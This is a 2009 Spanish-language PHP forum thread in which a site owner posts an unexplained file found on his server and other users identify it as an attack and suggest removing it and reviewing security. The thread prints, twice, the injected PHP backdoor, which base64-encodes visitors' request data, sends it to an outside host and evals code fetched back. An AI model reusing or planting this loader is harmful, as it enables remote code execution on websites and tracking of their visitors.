Foros del Web » Programando para Internet » PHP »

Que significa este PHP 50355.php

 Estas en el tema de Que significa este PHP 50355.php en el foro de PHP en Foros del Web. Código PHP: <? error_reporting ( 0 ); $a =(isset( $_SERVER [ "HTTP_HOST" ])? $_SERVER [ "HTTP_HOST" ]: $HTTP_HOST ); $b =(isset( $_SERVER [ "SERVER_NAME" ])? $_SERVER ...
  #1 (permalink)  
Antiguo 21/10/2009, 15:43
lucasabogado
Invitado
  
Mensajes: n/a
Puntos:
Que significa este PHP 50355.php
Código PHP:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnnngrhtddwsawertgfdw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="jhd645der3345692grlosd8985hjhf"$f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHghgr665654lkldfd984j").$f.$z))eval($c);else{$cu=curl_init(base64_decode("sdfg4456hjy67kifg65==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

se encuentra en mi web y yo no lo he puesto
muchas gracias
Última edición por lucasabogado; 21/10/2009 a las 15:44 Razón: mal redactado
  #2 (permalink)  
Antiguo 21/10/2009, 15:51
Avatar de abimaelrc
Colaborador
  
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.734
Antigüedad: 15 años
Puntos: 1517
Respuesta: Que significa este PHP 50355.php
Alguien esta enviando información de las personas que visitan tu pagina. Te sugiero leer sobre ataques XSS
Código PHP: 
Ver original
  1. <?PHP
  2. error_reporting(0);
  3. $a=(isset($_SERVER["HTTP_HOST"])?
  4.  $_SERVER["HTTP_HOST"]:
  5.  $HTTP_HOST);
  6. $b=(isset($_SERVER["SERVER_NAME"])?
  7.  $_SERVER["SERVER_NAME"]:
  8.  $SERVER_NAME);
  9. $c=(isset($_SERVER["REQUEST_URI"])?
  10.  $_SERVER["REQUEST_URI"]:
  11.  $REQUEST_URI);
  12. $d=(isset($_SERVER["PHP_SELF"])?
  13.  $_SERVER["PHP_SELF"]:
  14.  $PHP_SELF);
  15. $e=(isset($_SERVER["QUERY_STRING"])?
  16.  $_SERVER["QUERY_STRING"]:
  17.  $QUERY_STRING);
  18. $f=(isset($_SERVER["HTTP_REFERER"])?
  19.  $_SERVER["HTTP_REFERER"]:
  20.  $HTTP_REFERER);
  21. $g=(isset($_SERVER["HTTP_USER_AGENT"])?
  22.  $_SERVER["HTTP_USER_AGENT"]:
  23.  $HTTP_USER_AGENT);
  24. $h=(isset($_SERVER["REMOTE_ADDR"])?
  25.  $_SERVER["REMOTE_ADDR"]:
  26.  $REMOTE_ADDR);
  27. $i=(isset($_SERVER["SCRIPT_FILENAME"])?
  28.  $_SERVER["SCRIPT_FILENAME"]:
  29.  $SCRIPT_FILENAME);
  30. $j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?
  31.  $_SERVER["HTTP_ACCEPT_LANGUAGE"]:
  32.  $HTTP_ACCEPT_LANGUAGE);
  33. $z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);
  34. $f=base64_decode("cnnngrhtddwsawertgfdw==");
  35. if(basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="jhd645der3345692grlosd8985hjhf")
  36.   $f=$_REQUEST["id"];
  37. if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
  38. elseif($c=file_get_contents(base64_decode("aHghgr665654lkldfd984j").$f.$z))
  39.  eval($c);
  40. else{
  41.  $cu=curl_init(base64_decode("sdfg4456hjy67kifg65==").$f.$z);
  42.  curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
  43.  $o=curl_exec($cu);
  44.  curl_close($cu);
  45.  eval($o);
  46. };
  47. die();
  48. ?>
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
Última edición por abimaelrc; 21/10/2009 a las 15:56
  #3 (permalink)  
Antiguo 22/10/2009, 01:22
lucasabogado
Invitado
  
Mensajes: n/a
Puntos:
Respuesta: Que significa este PHP 50355.php
Muchas gracias por tu respuesta

Pero puede ser del google analitics ?

O es algun ataque ? a mi web
  #4 (permalink)  
Antiguo 22/10/2009, 04:59
 
Fecha de Ingreso: mayo-2005
Mensajes: 188
Antigüedad: 19 años
Puntos: 6
Respuesta: Que significa este PHP 50355.php
Es un ataque, nada de google analytics. O al menos tiene toda la pinta. Además, no sólo se envía la información de la petición a una página externa, sino que esta página externa devuelve código PHP que es evaluado: eval($o)
Última edición por juanfuentes; 22/10/2009 a las 05:00 Razón: ampliación
  #5 (permalink)  
Antiguo 22/10/2009, 09:15
lucasabogado
Invitado
  
Mensajes: n/a
Puntos:
Respuesta: Que significa este PHP 50355.php
Muchas gracias y como puedo quitar todo eso porque se ha colado casi todas las carpetas


saludos
  #6 (permalink)  
Antiguo 22/10/2009, 16:32
Avatar de abimaelrc
Colaborador
  
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.734
Antigüedad: 15 años
Puntos: 1517
Respuesta: Que significa este PHP 50355.php
Vas a tener que ir una a una y quitarlas.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
  #7 (permalink)  
Antiguo 23/10/2009, 00:39
Avatar de Animeonx  
Fecha de Ingreso: agosto-2009
Ubicación: Debajo de tu Cama
Mensajes: 56
Antigüedad: 14 años, 8 meses
Puntos: 3
Respuesta: Que significa este PHP 50355.php
Cita:
Iniciado por abimaelrc Ver Mensaje
Vas a tener que ir una a una y quitarlas.
Probablemente eso no servirá de nada si el ataque (si es que es un ataque) prosigue. Lo mejor seria revisar todos los sistemas de seguridad, tanto del programa como del servidor.
__________________
Si te gusto/sirvió mi respuesta, dame un buen karma... no se que utilidad tenga en el foro, pero eleva mi ego. :D
--
Comunidad Anime | ikawaii.net
  #8 (permalink)  
Antiguo 23/10/2009, 03:53
lucasabogado
Invitado
  
Mensajes: n/a
Puntos:
Respuesta: Que significa este PHP 50355.php
Muchas gracias a todos tambien me han comentado que cambie las contraseñas

para entrar en el servidor.

Saludos a todos
  #9 (permalink)  
Antiguo 23/10/2009, 06:27
Avatar de abimaelrc
Colaborador
  
Fecha de Ingreso: mayo-2009
Ubicación: En el planeta de Puerto Rico
Mensajes: 14.734
Antigüedad: 15 años
Puntos: 1517
Respuesta: Que significa este PHP 50355.php
@Animeonx, claro esta que hay que hacer unos cambios de seguridad, pero como el pregunto como quitar todo eso, entendí que se refiere a como quitar el codigo del archivo, no a evitar que hagan eso.
__________________
Verifica antes de preguntar.
Los verdaderos amigos se hieren con la verdad, para no perderlos con la mentira. - Eugenio Maria de Hostos
Atención: Estás leyendo un tema que no tiene actividad desde hace más de 6 MESES, te recomendamos abrir un Nuevo tema en lugar de responder al actual.
Respuesta


« Tema Anterior | Próximo Tema »


La zona horaria es GMT -6. Ahora son las 08:57.